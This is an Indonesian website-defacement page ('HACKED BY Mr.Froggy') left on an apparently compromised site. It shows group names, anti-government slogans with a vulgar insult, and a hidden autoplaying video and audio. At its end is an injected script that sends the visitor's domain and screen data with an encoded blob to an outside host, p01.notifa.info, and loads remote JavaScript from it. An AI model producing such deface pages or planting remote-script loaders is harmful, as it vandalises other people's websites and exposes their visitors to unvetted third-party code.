<html>


<head>


<title>HACKED BY Mr.Froggy</title>


<link rel="icon" type="image/png" href="https://g.top4top.io/p_1740oikjv0.jpg">  


<meta property="og:image" content="https://g.top4top.io/p_1740oikjv0.jpg">


<meta name="description" content="Dewan Penindasan Rakyat">


<meta name="og:title" content="HACKED BY Mr.Froggy">


<meta name="googlebot" content="index,follow">


<meta name="robots" content="all">


<meta name="robots schedule" content="auto">


<meta name="distribution" content="global">


<meta name="og:description" content="Dewan Penindasan Rakyat"> 


<body onload="type_text()" alink="#ffffff" vlink="#ffffff" link="#ffffff" text="#ffffff">


<table height=90% width=100%>





<td align=center>


</head>


<font face=courier new>


<font size=5>


 WEBSITE INI DI SITA OLEH RAKYAT<br>


<img src="https://g.top4top.io/p_1740oikjv0.jpg" height="250" width="550" title="Indonesian HackerRulez" />





<body bgcolor="#000000" text="#ffffff"><center>


<font face=courier new>


<font size=4>


$ HACKED BY CRAZYQIM.27 $<br><br>


<font size=3 color="red">DISAAT PENGUASA BERULAH


DISITULAH WEBSITEMU KUJADIKAN SEPERTI SAMPAH <br><br><font size=3 color="white">[GREENCYBER.27 - SURABAYA ERROR SYSTEM - SURABAYA NETWORK]<br><br>


	<pre>===DPR KONTOL===</pre>


</font>


<font face="Courier New" size="2" color="red">SURABAYA NETWORK~ <font face="Courier New" size="2" color="white"> ~ SURABAYA ERROR SYSTEM <img src="http://us.yimg.com/i/mesg/emoticons7/111.gif"width="30" height="18"></font></br>


</font>


<embed src="https://www.youtube.com/v/KDzt6yI3Dw8?autoplay=1" type="application/x-





shockwave-flash" wmode="transparent" height="1" width="1">


</style>


<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mvk8pvYqPw8AysTN4PqA%2f4N5iNp7cf3RLBUvNh%2b6hXtTFBkKJkDzFgdu8lghvDuMSnJ%2b4CkoXyGVF2pfZrHTRkWQqEAqJXlx2KFWJhPaW8mY6RQnFht3WUOGpEyVEv6KtRuEStu57K6mEXEE64ijxJFyaSQe%2boy%2b3dls2UnNnNmkanqSV3nNFktdWIG6KFzQ8MjItKSl2y1O6pZxXl1kAZtCuYF01Rq9mFt9FnL9%2bapxRahRKYz54c75ktmOCOuNPkF5XWvFgBm9v6nkTYi4lD4TyeAYUSUvLbnJw7ywFqriro47DdGUi8Nl5NGagwoj%2bywDRsjez8i2BigasOvAkPByqcn3KXB9utzZxHgsw71oLCdBjz1xAhopFTePRt0%2bNMckspWnnh50ieDY6WYQTmCKTbYT9ovVo4DMw5wJ4bTP8WXJRB1%2bofxMqmHEFif9oZb6sd5HNvtU%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>


</html>


<iframe width="0" height="0" src="https://g.top4top.io/m_1731nl5tb0.mp3" frameborder="0" allowfullscreen></iframe>